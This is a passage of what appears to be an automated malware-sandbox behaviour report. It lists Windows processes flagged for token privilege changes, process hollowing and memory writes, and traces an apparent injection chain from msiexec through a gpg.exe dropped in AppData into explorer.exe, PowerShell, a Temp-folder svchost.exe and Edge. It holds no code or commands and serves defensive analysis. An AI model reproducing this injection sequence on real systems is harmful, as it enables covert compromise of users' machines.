N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 320 wrote to memory of 696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 320 wrote to memory of 696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 320 wrote to memory of 696 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 696 wrote to memory of 224 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 224 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 224 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 320 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 320 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 320 wrote to memory of 4644 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 4644 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe C:\Windows\SysWOW64\explorer.exe
PID 3400 wrote to memory of 720 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 720 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 5084 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe
PID 3400 wrote to memory of 5084 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe
PID 720 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 720 wrote to memory of 1472 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 1568 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1472 wrote to memory of 828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
